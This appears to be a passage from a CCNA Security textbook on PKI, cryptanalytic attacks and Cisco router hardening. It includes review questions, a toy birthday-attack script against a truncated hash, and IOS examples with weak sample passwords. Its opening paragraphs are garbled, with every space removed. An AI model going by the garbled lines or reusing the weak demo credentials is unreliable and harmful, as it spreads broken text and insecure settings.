Oneconcepttokeepinmindistherevocationrequestgraceperiod.ThisperiodisthemaximumamountoftimebetweenwhentherevocationrequestisreceivedbytheCAandwhentherevocationactuallyoccurs.Ashorterrevocationperiodprovidesbettersecuritybutoftenresultsinahigherimplementationcost.
UsesCertificatescanbeusedforvarietyofoperations.Thiscanincludeauthentication,encryption,digitalsignatures,andemailtonameafew.VeriSignfirstintroducedthefollowingdigitalcertificateclasses:
Class1:Forindividualsintendedforemail.Thesecertificatesgetsavedbywebbrowsers.
Class2:Fororganizationsthatmustprovideproofofidentity.
Class3:ForserversandsoftwaresigninginwhichindependentverificationandidentityandauthoritycheckingisdonebytheissuingCA.
Class4:Foronlinebusinesstransactionsbetweencompanies.
Class5:Forprivateorganizationsorgovernmentalsecurity.
Application:SSL/TLSCertificatesareoftenusedwhenusingSSL/TLS.MostmodernsystemstodayuseTLS,butthe
termSSLisoftenstillusedtorefertotheconnection.SSLisusedtoprotectmanytypesofapplications,themostcommonbeingHTTPS(asHTTPiscalledwhenusedwithSSL).
AnSSLsessionisformedbetweenawebserverandthewebbrowseroftheclient.Figure3.10depictstheprocess.
CertificateAuthoritiesAcertificationauthority(CA)istheentitythatcreatesandsignsdigitalcertificates,maintainsthecertificates,andrevokesthemwhennecessary.EveryentitythatwantstoparticipateinthePKImustcontacttheCAandrequestadigitalcertificate.ItistheultimateauthorityfortheauthenticityforeveryparticipantinthePKIandsignseachdigitalcertificate.Thecertificatebindstheidentityoftheparticipanttothepublickey.
Anyparticipantthatrequestsacertificatemustfirstgothroughtheregistrationauthority(RA),whichverifiestherequestor’sidentityandregisterstherequestor.Aftertheidentityisverified,theRApassestherequesttotheCA.Inmanycases,theCAandtheRAarethesameserver.
TherearedifferenttypesofCAs.OrganizationsexistthatprovideaPKIasapayableservicetocompaniesthatneedthem.AnexampleisVeriSign.SomeorganizationsimplementtheirownprivateCAssothattheorganizationcancontrolallaspectsofthePKIprocess.Ifanorganizationislargeenough,itmightneedtoprovideastructureofCAs,withtherootCAbeingthehighestinthehierarchy.
BecausemorethanoneentityisofteninvolvedinthePKIcertificationprocess,certificationpathvalidationallowstheparticipantstocheckthelegitimacyofthecertificatesinthecertificationpath.
WhenimplementingaPKI,mostorganizationsrelyonahierarchicalchain-of-trustmodelthatusesthreecomponentsatminimum:certificateauthorities(CAs),registrationauthorities(RAs),andacentraldirectory/distributionmanagementmechanism.
FIGURE3.10SSLprocess
A CA issues certificates that bind a public key to a specific distinguished name (DN) issued to the certificate applicant (user). Before issuing a certificate, however, the CA validates the applicant's identity.
When a subject's public certificate is received, the system must verify its authenticity. Because the certificate includes the issuer's information, the verification process checks to see whether it already has the issuer's public certificate. If not, it must retrieve it (servers usually send their intermediate certificates along with their own certificate for this reason).
A root CA is at the top of the certificate signing hierarchy. VeriSign, Comodo, and Entrust are examples of public root CAs. For organizations that maintain their own PKI, the first CA created will be the root CA.
Using the issuer's certificate, the system verifies the issuer's signature on the subject certificate and ensures that the subject certificate is not expired or revoked (by consulting a certificate revocation list or an OCSP responder). If verification is successful, the system accepts the subject certificate as valid.
Root CAs can delegate signing authority to other entities. These entities are known as intermediate CAs. Intermediate CAs are trusted only if the signature on their public key certificate is from a root CA or can be traced back through other intermediates to a root. Because a root CA can delegate to intermediate CAs, a lengthy chain of trust can exist.
Any system receiving a subject certificate can verify its authenticity by stepping up the chain of trust to the root. Only the root certificates the system has been configured to trust (its trust anchors) can end the walk; a chain that ends at an unknown self-signed certificate is rejected.
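The following Python program is an added illustration of the path validation just described; it is not from the book and not a real X.509 implementation. It uses textbook RSA with small fixed Mersenne primes and plain dictionaries in place of certificates, and the hierarchy (Root CA, Issuing CA, asa.example.com, a Rogue CA) is invented for the demonstration. The point is the walk from the subject certificate up to a trust anchor, with the expiry, revocation, signature, and unknown-issuer checks applied at every step.

```python
import hashlib

# Added example: certification path validation with a toy RSA and dict "certificates".
# Mersenne primes keep the keys deterministic; these key sizes are for illustration only.
MERSENNE_PAIRS = [(2**127 - 1, 2**107 - 1), (2**89 - 1, 2**61 - 1),
                  (2**31 - 1, 2**19 - 1), (2**17 - 1, 2**13 - 1)]

def make_keypair(p, q, e=65537):
    """Return ((n, e), (n, d)) for textbook RSA (no padding; toy use only)."""
    n, phi = p * q, (p - 1) * (q - 1)
    return (n, e), (n, pow(e, -1, phi))

def _digest(data, n):
    return int.from_bytes(hashlib.sha256(data).digest(), "big") % n

def sign(priv, data):
    n, d = priv
    return pow(_digest(data, n), d, n)

def verify(pub, data, sig):
    n, e = pub
    return pow(sig, e, n) == _digest(data, n)

def tbs(cert):
    """Canonical to-be-signed bytes: every field except the signature."""
    return "|".join(str(cert[k]) for k in
                    ("serial", "subject", "issuer", "pub", "not_after")).encode()

def issue(issuer_priv, issuer, subject, subject_pub, serial, not_after):
    """The CA binds subject name and public key by signing them with its private key."""
    cert = {"serial": serial, "subject": subject, "issuer": issuer,
            "pub": subject_pub, "not_after": not_after}
    cert["sig"] = sign(issuer_priv, tbs(cert))
    return cert

def validate_path(leaf, intermediates, trust_anchors, crl, now, max_depth=5):
    """Step up from the subject certificate until a configured trust anchor signs it."""
    anchors = {c["subject"]: c for c in trust_anchors}
    pool = {c["subject"]: c for c in intermediates}
    cert = leaf
    for _ in range(max_depth):
        if now > cert["not_after"]:
            return False, f"{cert['subject']}: expired"
        if cert["serial"] in crl:
            return False, f"{cert['subject']}: revoked"
        issuer = anchors.get(cert["issuer"]) or pool.get(cert["issuer"])
        if issuer is None:
            return False, f"{cert['subject']}: issuer {cert['issuer']} not trusted"
        if not verify(issuer["pub"], tbs(cert), cert["sig"]):
            return False, f"{cert['subject']}: bad signature"
        if cert["issuer"] in anchors:
            return True, f"chain anchored at {cert['issuer']}"
        cert = issuer                      # continue with the intermediate's certificate
    return False, "path too long"

# Constructed hierarchy: offline root, issuing intermediate, a leaf, and a rogue CA nobody trusts.
ROOT_PUB, ROOT_PRIV = make_keypair(*MERSENNE_PAIRS[0])
INT_PUB, INT_PRIV = make_keypair(*MERSENNE_PAIRS[1])
LEAF_PUB, _LEAF_PRIV = make_keypair(*MERSENNE_PAIRS[2])
ROGUE_PUB, ROGUE_PRIV = make_keypair(*MERSENNE_PAIRS[3])
NOW = 1_700_000_000
DAY = 86400
ROOT = issue(ROOT_PRIV, "Root CA", "Root CA", ROOT_PUB, 1, NOW + 3650 * DAY)
INTER = issue(ROOT_PRIV, "Root CA", "Issuing CA", INT_PUB, 2, NOW + 1825 * DAY)
LEAF = issue(INT_PRIV, "Issuing CA", "asa.example.com", LEAF_PUB, 3, NOW + 365 * DAY)
ROGUE_LEAF = issue(ROGUE_PRIV, "Rogue CA", "asa.example.com", LEAF_PUB, 4, NOW + 365 * DAY)
EXPIRED_LEAF = issue(INT_PRIV, "Issuing CA", "old.example.com", LEAF_PUB, 5, NOW - 1)

def demo():
    """Outcome of path validation for the four scenarios (True = accepted)."""
    return {
        "valid": validate_path(LEAF, [INTER], [ROOT], set(), NOW)[0],
        "untrusted_issuer": validate_path(ROGUE_LEAF, [INTER], [ROOT], set(), NOW)[0],
        "revoked_intermediate": validate_path(LEAF, [INTER], [ROOT], {2}, NOW)[0],
        "expired": validate_path(EXPIRED_LEAF, [INTER], [ROOT], set(), NOW)[0],
    }

if __name__ == "__main__":
    for case, accepted in demo().items():
        print(f"{case:22} {accepted}")
```

Note that the root certificate is never "verified" in the ordinary sense: it is accepted because it is in the trust store, which is exactly why installing a CA's root certificate on a browser or device (as described later for the ASA) is a decision with security consequences.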
PKI Standards  Public Key Cryptography Standards (PKCS) were created by RSA Security. While they were created to help promote techniques for which RSA held patents, many of these standards have since been adopted as IETF standards (for example, PKCS #1 as RFC 8017, PKCS #10 as RFC 2986, and PKCS #12 as RFC 7292). Table 3.2 shows the standards that have not since been abandoned or obsoleted.
TABLE 3.2 PKI standards
Standard | Version | Name | Description
PKCS #1 | 2.2 | RSA Cryptography Standard | Defines the mathematical properties and format of RSA public and private keys and the basic algorithms and encoding/padding schemes for performing RSA encryption and decryption and for producing and verifying signatures.
PKCS #3 | 1.4 | Diffie-Hellman Key Agreement Standard | A cryptographic protocol that allows two parties that have no prior knowledge of each other to jointly establish a shared secret key over an insecure communications channel.
PKCS #5 | 2.0 | Password-Based Encryption Standard | Provides recommendations for the implementation of password-based cryptography, covering key derivation functions (PBKDF2), encryption schemes, message-authentication schemes, and ASN.1 syntax identifying the techniques.
PKCS #7 | 1.5 | Cryptographic Message Syntax Standard | Used to sign and/or encrypt messages under a PKI and to distribute certificates (for example, as the response to a PKCS #10 request). Formed the basis for S/MIME and the IETF Cryptographic Message Syntax (CMS).
PKCS #8 | 1.2 | Private-Key Information Syntax Standard | Used to carry private keys (encrypted or unencrypted) together with the algorithm identifier and optional attributes.
PKCS #9 | 2.0 | Selected Attribute Types | Defines selected attribute types for use in PKCS #6 extended certificates, PKCS #7 digitally signed messages, PKCS #8 private-key information, and PKCS #10 certificate-signing requests.
PKCS #10 | 1.7 | Certification Request Standard | Format of messages sent to a certification authority to request certification of a public key (the certificate signing request, or CSR).
PKCS #11 | 2.4 | Cryptographic Token Interface | Also known as Cryptoki. An API defining a generic interface to cryptographic tokens (see also hardware security module). Often used in single sign-on, public-key cryptography, and disk encryption.
PKCS #12 | 1.1 | Personal Information Exchange Syntax Standard | Defines a file format commonly used to store private keys with accompanying public key certificates, protected with a password-based symmetric key.
PKCS #15 | 1.1 | Cryptographic Token Information Format Standard | Defines a standard allowing users of cryptographic tokens to identify themselves to applications, independent of the application's Cryptoki implementation (PKCS #11) or other API.
PKI Topologies  A PKI can consist of a single server that operates as RA and CA and is the root certificate server. But in very large environments, you may be advised to create a hierarchy of CAs. When this is done, a single CA will be the root CA and the top of the hierarchy. Underneath this would be a number of subordinate CAs that actually issue the certificates to the entities. The root CA creates and signs the certificates of the subordinate CAs, which creates a trust path up to the root. Keeping the root offline and issuing only through subordinates limits the damage if an issuing CA is compromised, because the subordinate can be revoked without replacing the root. Figure 3.11 shows this arrangement.
FIGURE 3.11 PKI hierarchy
In some cases, two organizations may have a need to trust one another's certificates. This can be done by configuring cross certification. In cross certification, a trust is created between the two root CAs (each root issues a cross certificate for the other), which enables both systems to trust all certificates, as shown in Figure 3.12.
FIGURE 3.12 Cross certification
Certificates in the ASA  The Cisco Adaptive Security Appliance (ASA) makes use of certificates and the associated keys to protect the connection of the administrator to the ASA using the Adaptive Security Device Manager (ASDM) and to support SSL VPN clients. In this section, you'll learn about the default certificate that is present in the ASA, the process of adding a certificate and viewing the certificates that are present, and the use of the Simple Certificate Enrollment Protocol (SCEP).
Default Certificate  The ASA has a self-signed default certificate that can be used for the operations listed in the previous section. The issue with a self-signed certificate is that no browsers or devices will have the ASA listed as a trusted CA. Because of this, any HTTPS connections to the ASA will generate a warning message that the certificate being presented is not trusted. To avoid this issue, obtain an identity certificate for the ASA from a CA whose root certificate is already present in the browsers and devices that will interact with the ASA (either a private CA that you own and whose root you have distributed, or a public CA).
Viewing and Adding Certificates in the ASDM  To view the current certificates in the ASDM, select Configuration at the top of the ASDM console and Device Management from the tabs on the left side of the console, as shown in Figure 3.13. As you can see, this ASA currently has no certificates installed other than the default.
FIGURE 3.13 Viewing certificates
To add a certificate, follow these steps:
1. In the Cisco ASDM Configuration Tool, select Configuration > Device Management > Certificate Management > CA Certificates.
2. Click Add. The Install Certificate dialog box appears. You have three options: install from a file, paste the information, or use SCEP. If the root CA represented by the root certificate supports SCEP, choose that option. Otherwise, use the next two steps.
3. Enter a trustpoint name or use the default name that appears in the box.
4. Click the Install From A File radio button and browse to the location of the Root.crt file that you are installing.
5. Click the More Options button, and here you can configure how certificate revocation will be checked, the protocols to be used for certificate verification, and other settings.
SCEP  Simple Certificate Enrollment Protocol is a protocol used for enrollment and other PKI operations. It is supported on most Cisco devices. It simplifies the process of obtaining and installing both the root and the identity certificates. Because SCEP itself does little to authenticate the requester, protect enrollment with a one-time challenge password issued by the CA, and verify the fingerprint of the CA certificate that SCEP returns before trusting it. The process to use SCEP is as follows:
1. Choose Configuration > Device Management > Certificate Management > Identity Certificates and click Add.
2. Click the Add A New Identity Certificate radio button and click the Advanced button.
3. In the Advanced box, on the Enrollment Mode tab, select Request From A CA and then enter the IP address of the CA that supports SCEP. Click OK.
4. In the Add A New Identity Certificate dialog box, select Add Certificate. If the enrollment is successful, you will receive an Enrollment Succeeded message.
Cryptanalysis  In cryptanalysis, cryptography attacks are categorized as either passive or active attacks. A passive attack is usually implemented just to discover information and is much harder to detect because it is usually carried out by eavesdropping or packet sniffing. Active attacks involve an attacker actually carrying out steps, such as message alteration or file modification. Cryptography is usually attacked via the key, the algorithm, the execution (the implementation), the data, or the people. But most of these attacks are attempting to discover the key used.
Ciphertext-Only Attack  In a ciphertext-only attack, an attacker uses several encrypted messages (ciphertext) to figure out the key used in the encryption process. Although it is a common type of attack, it is usually not successful against modern ciphers because so little is known about the encryption used.
Known Plaintext Attack  In a known plaintext attack, an attacker uses the plaintext and ciphertext versions of a message to discover the key used. This type of attack uses reverse engineering, frequency analysis, or brute force to determine the key so that all messages can be deciphered.
Chosen Plaintext Attack  In a chosen plaintext attack, an attacker chooses the plaintext to get encrypted to obtain the ciphertext. The attacker sends a message hoping that the user will forward that message as ciphertext to another user. The attacker captures the ciphertext version of the message and tries to determine the key by comparing the plaintext version he originated with the captured ciphertext version. Once again, key discovery is the goal of this attack.
Chosen Ciphertext Attack  A chosen ciphertext attack is the opposite of a chosen plaintext attack. In a chosen ciphertext attack, an attacker chooses the ciphertext to be decrypted to obtain the plaintext. This attack is more difficult because access to the system that implements the algorithm (a decryption oracle) is needed.
Brute Force  As with a brute-force attack against passwords, a brute-force attack executed against a cryptographic algorithm tries all possible keys until a key is discovered that successfully decrypts the ciphertext. This attack requires considerable time and processing power, and its cost doubles with every additional bit of key length; this is why 56-bit DES is now considered breakable and keys of 128 bits or more are expected.
Birthday Attack  A birthday attack uses the premise that finding any two messages that result in the same hash value (a collision) is much easier than finding a message that matches a given hash value. For a hash with an n-bit output, a collision is expected after roughly 2^(n/2) attempts, whereas matching a given value takes about 2^n. A hash therefore offers only half its output length in collision resistance, which is why MD5 (128 bits) and SHA-1 (160 bits) are no longer acceptable for digital signatures and SHA-2 with 256 bits or more is used instead.
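As an added example that is not part of the book, the following Python code runs a birthday attack against a deliberately weakened hash. SHA-256 is truncated to 32 bits to stand in for a hash with a short output; the messages (an invented "invoice-" prefix plus a counter) are constructed for the demonstration. The search finds a collision after tens of thousands of hashes, where matching one specific 32-bit value would take about four billion.

```python
import hashlib
import math

# Added example: birthday attack on a truncated hash (not from the book).

def trunc_hash(msg: bytes, bits: int) -> int:
    """Return the first `bits` bits of SHA-256(msg) as an integer."""
    return int.from_bytes(hashlib.sha256(msg).digest(), "big") >> (256 - bits)

def find_collision(bits: int, prefix: bytes = b"invoice-"):
    """Hash distinct messages until two of them share a truncated hash value.

    Returns (msg_a, msg_b, attempts). Messages are prefix + counter, so every
    candidate is distinct and the run is deterministic.
    """
    seen = {}
    attempts = 0
    while True:
        msg = prefix + attempts.to_bytes(8, "big")
        h = trunc_hash(msg, bits)
        if h in seen:                      # an earlier message already produced this value
            return seen[h], msg, attempts + 1
        seen[h] = msg
        attempts += 1

def expected_attempts(bits: int) -> float:
    """Birthday bound: about sqrt(pi/2 * 2^bits) hashes for a 50% collision chance."""
    return math.sqrt(math.pi / 2 * 2 ** bits)

def preimage_attempts(bits: int) -> int:
    """Matching one given hash value needs about 2^bits attempts on average."""
    return 2 ** bits

if __name__ == "__main__":
    a, b, n = find_collision(32)
    print(f"collision after {n} hashes (expected ~{expected_attempts(32):.0f}, "
          f"preimage would need ~{preimage_attempts(32)})")
    print(a, b, hex(trunc_hash(a, 32)))
```

The attacker does not get to choose what the colliding messages say, which is why practical birthday attacks on signatures pair a benign document and a malicious one that both contain hidden variable fields the attacker can iterate over.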
Meet-in-the-Middle Attack  In a meet-in-the-middle attack, an attacker targets a cipher that applies two (or more) encryption stages with independent keys. The attacker encrypts a known plaintext under every possible first-stage key and decrypts the matching ciphertext under every possible second-stage key, then looks for a value where the two sets "meet." Rather than costing 2^(2k) operations for two k-bit keys, the attack costs about 2^(k+1) operations plus memory for the table. This is why double DES is not used, and why Triple DES with three 56-bit keys has an effective strength of only 112 bits.
Summary  In this chapter, you learned about symmetric and asymmetric key cryptography and how they differ. The chapter gave examples of each type of algorithm, and you learned how they can work together in a hybrid system. You also learned about the hashing process and looked at the major hashing algorithms. There was coverage of PKI and the components that make it function. Finally, you learned about common attacks on cryptography.
Exam Essentials  Differentiate between symmetric and asymmetric key cryptography. This includes the types of keys used, the scenarios in which they are used, and the disadvantages and advantages of each.
Describe the hashing process. This includes how hashing algorithms work, examples of hashing algorithms, and the role of hashing in digital signatures.
Explain the role of a PKI. Describe the components of a PKI, the certificate enrollment process, and the use of public and private keys in the process.
Define cryptanalytic attacks. These include ciphertext-only attack, chosen plaintext, chosen ciphertext, brute force, birthday, and meet-in-the-middle.
Review Questions
1. Which of the following is not true of symmetric algorithms?
A. They use a public key.
B. They are faster than asymmetric algorithms.
C. They present key exchange issues.
D. They are typically used for data at rest.
2. Which of the following is not true of asymmetric algorithms?
A. They provide automatic key exchange.
B. They are typically used for data at rest.
C. They use a private and public key.
D. They are slower than symmetric algorithms.
3. Which of the following is not an advantage of block ciphers?
A. The implementation is easier than stream-based cipher implementation.
B. Generally they are less susceptible to security issues.
C. Generally they are used more in software implementations.
D. They employ only substitution.
4. Which of the following ciphers perform encryption on a bit-by-bit basis?
A. Block
B. Stream
C. Asymmetric
D. Polyalphabetic
5. Which of the following is used to ensure that patterns are not produced during encryption?
A. IVs
B. HMAC
C. RC4
D. Salting
6. In which of the following modes of DES is every 64-bit block encrypted with the same key?
A. CBC
B. ECB
C. ECC
D. CFB
7. Which of the following is the replacement algorithm for 3DES?
A. Blowfish
B. AES
C. IDEA
D. RC4
8. Which of the following is the most popular asymmetric algorithm?
A. RSA
B. ElGamal
C. DSA
D. ECC
9. Which of the following occurs when a hash function produces the same hash value on different messages?
A. Birthday attack
B. Key exposure
C. Collision
D. Substitution
10. Which of the following hashing algorithms is required by the U.S. government?
A. MD4
B. MD5
C. SHA1
D. SHA2
11. Which of the following can help to reduce the collision rate of the hash function?
A. MAC
B. HMAC
C. Digital signatures
D. Substitution
12. Which of the following is a hash value encrypted with the sender's private key?
A. Salt
B. Nonce
C. Digital signature
D. HMAC
13. Which of the following is true of a hybrid cryptosystem?
A. Asymmetric algorithms are used for the key exchange.
B. Symmetric keys are used for the key exchange.
C. Asymmetric keys are used for the data encryption.
D. Asymmetric keys are exchanged automatically.
14. Which of the following is a digital document binding a key pair to an entity?
A. Certificate
B. Nonce
C. Salt
D. IV
15. Which of the following is the standard for digital certificates?
A. X.500
B. X.509
C. IEEE 509
D. RFC 500
16. Which of the following is a list of digital certificates that a CA has revoked?
A. OCSP
B. CRL
C. SCEP
D. REVC
17. Which of the following certificate classes is for individuals intended for email?
A. 1
B. 2
C. 3
D. 4
18. Which of the following PKI components verifies the requestor's identity?
A. CA
B. RA
C. DN
D. CN
19. Which of the following can be used to allow one root CA to trust another root CA's certificates?
A. Subordination
B. Cross certification
C. Certlink
D. Trust
20. What type of certificate does the ASA use out of the box?
A. Public
B. Self-signed
C. Globally trusted
D. Locally trusted
Chapter 4 Securing the Routing Process
CISCO CCNA SECURITY EXAM OBJECTIVES COVERED IN THIS CHAPTER:
4.1 Security on Cisco routers
Configure multiple privilege levels
Configure Cisco IOS role-based CLI access
Implement Cisco IOS resilient configuration
4.2 Securing routing protocols
Implement routing update authentication on OSPF
4.3 Securing the control plane
Explain the function of control plane policing
To provide secure routing and switching, the routers and switches themselves must be secured. Leaving them in a vulnerable state can render all other security implementations useless because unauthorized access can allow a malicious individual to alter all the security settings that are in place. Additionally, when routers are exchanging routing updates, any unauthenticated updates can reveal important information about your network to anyone who convinces your router to perform a routing update. In this chapter, you will explore functionality you should take advantage of to secure access to the devices, to secure routing updates, and to secure the control plane.
In this chapter, you will learn the following:
Securing Cisco routers
Securing routing protocols
Securing Router Access  Securing administrative access to the router is the first step in securing the routing process. This prevents unauthorized access to the router, which will ensure that the configuration of the router cannot be altered. In this section, you'll learn about configuring secure administrative access using several tools.
First I'll discuss how to configure an encrypted session with the router using SSH rather than Telnet (which transmits in clear text). Next I'll talk about controlling the operations of each individual technician by assigning privilege levels. As privilege levels do not meet the needs of all environments, you'll also look at a way to get more granular with the assignment of tasks by authorizing functions via the command-line interface (CLI) with role-based CLI. Finally, I'll discuss how to protect the configuration of the router using the Cisco IOS resilient configuration feature.
Configuring SSH Access  While Telnet can certainly be used to manage a router, this remote access technology transmits everything in clear text, making it unsuitable in today's environments. For this reason, you should always use Secure Shell (SSH) for secure remote access. The SSH server on the router will require an RSA public/private key pair to use in the process of encrypting the traffic. It can generate this key pair but must have certain information configured before it can do so because it uses this information as the label for the key pair.
Therefore, the high-level steps to set up SSH are as follows:
1. Set the router name.
2. Set the router domain name.
3. Generate the RSA key.
Here are the actual commands:
Router(config)# hostname R63
R63(config)# ip domain-name mcmillan.com
R63(config)# crypto key generate rsa ?
  encryption    Generate a general purpose RSA key pair for signing and encryption
  exportable    Allow the key to be exported
  general-keys  Generate a general purpose RSA key pair for signing and encryption
  label         Provide a label
  modulus       Provide number of modulus bits on the command line
  on            create key on specified device.
  redundancy    Allow the key to be synced to high-availability peer
  signature     Generate a general purpose RSA key pair for signing and encryption
  storage       Store key on specified device
  usage-keys    Generate separate RSA key pairs for signing and encryption
R63(config)# crypto key generate rsa modulus 1024
The name for the keys will be: R63.mcmillan.com
% The key modulus size is 1024 bits
% Generating 1024 bit RSA keys, keys will be non-exportable...
[OK] (elapsed time was 2 seconds)
R63(config)#
*Mar 28 18:32:09.095: %SSH-5-ENABLED: SSH 1.99 has been enabled
In these steps, you can see I created a name, R63; set the domain name to mcmillan.com; and generated a key. The modulus keyword I used sets the length of the key, which in this case is 1,024 bits; current guidance is to use a modulus of at least 2,048 bits. Notice the syslog message that indicates SSH version 1.99 has been enabled. This indicates it is a version 2 server that can also accept connections from SSH version 1 clients. Because SSH version 1 has known weaknesses, add the command ip ssh version 2 to restrict the router to version 2 only.
Next you need to do the following:
1. Create a username and password for each user who needs SSH access.
2. Configure line vty to only accept SSH connections.
R63(config)# username troy secret mac
R63(config)# line vty ?
  <0-1114>  First Line number
R63(config)# line vty 0 1114
R63(config-line)# login local
R63(config-line)# transport input ssh
R63(config-line)#
Notice that I created a user named troy with a password of mac (the secret keyword stores the password as a hash rather than in a reversible form; a real password should of course be far stronger). You can create a single account to be shared by all authorized technicians and name it something like admin, or you can create separate accounts for each user. Separate accounts will provide accountability.
Also notice that when I entered line vty mode, I checked to see how many vty lines this device has so that when I run the command to enter that mode, the commands I apply will apply to all lines. The command login local tells the router that all user accounts will be found locally on this router and not on a remote server. That's why I needed to create the local account that I did. Finally, I set the router to only accept SSH connections with the last command.
Configuring Privilege Levels in IOS  Privilege levels allow you to assign a technician sets of activities that coincide with the level the technician has been assigned. There are 16 levels, from 0 to 15. When you are in user mode (router>), you are at privilege level 1. When you are in privileged mode (router#), you are at level 15.
You can assign levels between 0 and 15, and by linking these levels with commands, you can control the activities of each technician. This can be done on both IOS devices and on the Cisco Adaptive Security Appliance (ASA), although the details of each process are slightly different. Privilege levels are created at the global configuration prompt router(config)#. When a level is created, you also add a command at the same time, which means if you are adding multiple commands to the level, you will run the privilege command several times. Once a level is created, access to that level is obtained by entering a password assigned to that level. From a high level, here are the steps required:
1. Create the level and assign a command to that level.
2. Assign any additional commands to the level.
3. Set a password for the level.
4. Provide the level number and password to the technician (or technicians) who will use it.
First I will create a level numbered 12, and I will assign the show interfaces command to it. Notice that when I do this, I have to assign the command to the mode where it is usually executed, in this case EXEC mode, using the exec keyword.
router(config)# privilege exec level 12 show interfaces
To demonstrate how to assign a command that is executed in a different mode, I am now going to add the interface configuration command, and since that command is executed normally in global configuration mode, I will use the configure keyword when I add it.
router(config)# privilege configure level 12 interface
My intent is to allow this technician to change IP addresses on interfaces, so I need to assign him that command. Since the ip command (along with the parameter address) is executed after entering interface configuration mode, I have to reference interface in the command, as shown here:
router(config)# privilege interface level 12 ip
Be aware that this grants every ip subcommand in interface mode; to limit the technician to addressing alone, specify ip address instead of ip.
Now I'm ready to assign a password for level 12 that I just created. That is done the same way any enable secret password is created, adding the level to which it applies as shown next (otherwise it will apply to level 15 as it usually does). The password I set is wordpass.
router(config)# enable secret level 12 wordpass
Once I provide the level number and password to the technician, he will use the password to enter the privilege level as shown here, making it possible to use those commands (plus the commands of level 1, which every higher level inherits) and no others. To verify the application of the level, he can type show privilege as is also shown.
router# enable 12
Password: wordpass
router# show privilege
Current privilege level is 12
If he attempts to use any other commands, he will receive the error message shown here:
router# show run
              ^
% Invalid input detected at '^' marker.
Configuring IOS Role-Based CLI
Another option you can use to control the operations of technicians is a role-based CLI. Using this approach, you can create roles, implemented as sets of operations called parser views. The only view that exists by default is called root, which as you would expect allows access to all commands. Access to this view is provided when you enter enable view and submit the enable secret password. Role-based CLI requires that aaa new-model be configured, and views can be created only from the root view.
Once a parser view is created, you can permit access to the view with a password. This makes it simple to onboard a new technician by assigning him the role he will play in the network. Every technician granted the role will have the same set of operations available.
From a high level, here are the steps required:
1. Create and name the parser view.
2. Assign a password to the parser view.
3. Assign commands to the parser view.
4. Provide the parser view name and password to technicians in the role.
First I will create a view called OSPFAdmin.
R63(config)# parser view OSPFAdmin
R63(config-view)#
Notice the prompt has changed, and now any commands I run will affect only this view. At this prompt I can both set a password and assign commands to the view. First I'll assign a password.
R63(config-view)# secret OSPFp@$$
R63(config-view)#
Now I will assign commands. I won't assign all commands required to manage OSPF, just enough to show you how it's done. You must ensure that you have provided all commands required for the role.
R63(config-view)# commands exec include all show
R63(config-view)# commands exec include all debug ip ospf
R63(config-view)# commands exec include all no debug
R63(config-view)# commands exec include all undebug
R63(config-view)# commands configure include router ospf
I have allowed access in EXEC mode to all show commands and to the debug ip ospf commands required. Then I allowed access to the router ospf command, which will include all commands within that context. After a technician has been assigned this role, he will access the role using the following commands. Notice that you can verify the application of the role by using the show parser view command.
R63# enable view OSPFAdmin
Password: OSPFp@$$
R63# show parser view
Current view is 'OSPFAdmin'
Implementing Cisco IOS Resilient Configuration  While securing access to the router should be enough to effectively protect the configuration of the router, there is an additional way to prevent unwanted changes to the configuration. The IOS resilient configuration feature can provide a way to easily recover from an attack on the configuration, and it can also help to recover from an even worse attack in which the attacker deletes not only the startup configuration but also the boot image.
The configuration of this feature can be done with two commands. One enables protection of the boot image, and the other enables protection of the startup configuration. To enable protection of the boot image, issue the following command:
R64(config)# secure boot-image
*April 2 14:24:50.231: %IOS_Resilience-5-IMAGE_RESIL_ACTIVE: Successfully secured running image
Notice the system message indicating the boot image is protected. To enable protection of the startup configuration, issue the following command:
R64(config)# secure boot-config
*April 2 14:24:50.231: %IOS_Resilience-5-CONFIG_RESIL_ACTIVE: Successfully secured config archive [flash:.runcfg-20140131-14259.ar]
Once these two items are secured (called the secure bootset), the secured files are hidden from dir listings and cannot be deleted or overwritten from the CLI. The archived configuration is a snapshot taken when the command was issued and is not refreshed when you save changes, so to keep the archive current you remove the secure configuration long enough to make the change and then resecure it as was done in the first place. To remove the secure startup configuration, execute the following command:
R64(config)# no secure boot-config
*April 2 14:34:50.231: %IOS_Resilience-5-CONFIG_RESIL_INACTIVE: Disabled secure config archive [removed flash:.runcfg-20140131-14259.ar]
When finished making changes, execute the secure boot-config command to secure the configuration again.
But what do you do if the worst happens and the startup configuration is deleted? It can be restored, but you must know the location of the secure boot configuration, and you must reference it in the command. To identify its name and location, execute the following command:
R64# show secure bootset
IOS resilience router id FTX1125A67x
IOS image resilience version 12.4 activated at 14:24:50 UTC Mon April 2 2017
Secure archive flash:/c2800nm-advipservicesk9-mz.124-25e.bin type is image (elf) []
  Runnable image, entry point 0x8000F000, run from ram
IOS image resilience version 12.4 activated at 14:24:50 UTC Mon April 2 2017
Secure archive flash:.runcfg-20140131-14259.ar type is config
Configuration archive size 4060 bytes
With the location of the secure configuration in hand, now run the following command to restore the configuration:
R64(config)# secure boot-config restore flash:.runcfg-20140131-14259.ar
ios resilience:configuration successfully restored as flash:.runcfg-20140131-14259.ar
The restore writes the archived configuration to the filename you supply; copy that file to the startup configuration (or the running configuration) to put it back into effect. In case you were already wondering what would stop a hacker from using these commands, it is worth knowing that the feature can be disabled (no secure boot-image and no secure boot-config) only from a console session, so remote access alone is not enough to remove the protection.
Securing Routing Protocols  One of the ways in which a malicious individual may attempt to gather information about your network is to enable the routing protocol in use on a workstation and convince your routers to allow the workstation to become a routing neighbor, allowing the malicious individual to receive routing updates from your routers. As if this isn't enough to be concerned about, he may also convince your routers to accept a malicious routing update from his workstation, which could pollute the routing tables of your routers. If this occurs, it could result in an inability of the routers to properly route, which would be a form of denial-of-service attack. Moreover, he could inject routes that cause traffic to be directed to him as a prelude to a man-in-the-middle attack.
To prevent this, you can configure the routers to authenticate one another when performing routing updates. In the following two sections, you'll learn how to do this for the two most commonly used interior routing protocols, OSPF and EIGRP.
Implementing OSPF Routing Update Authentication  OSPF routing updates are authenticated using a keyed hash: each packet carries a digest computed over the packet and a shared key, so a neighbor without the key can neither have its updates accepted nor alter a genuine update in transit. You can use either MD5 or SHA-256 HMAC (defined in RFC 5709). Be aware, however, that some devices may support only MD5. The following are the high-level steps to configuring this:
1. Define a key chain (a key chain can hold multiple keys if required, which allows keys to be rotated without dropping the adjacency).
2. Define a key by number (the key ID) that will reside on the key chain.
3. Specify the key characters of the key.
4. Specify the hashing algorithm.
5. Apply the key chain to an interface.
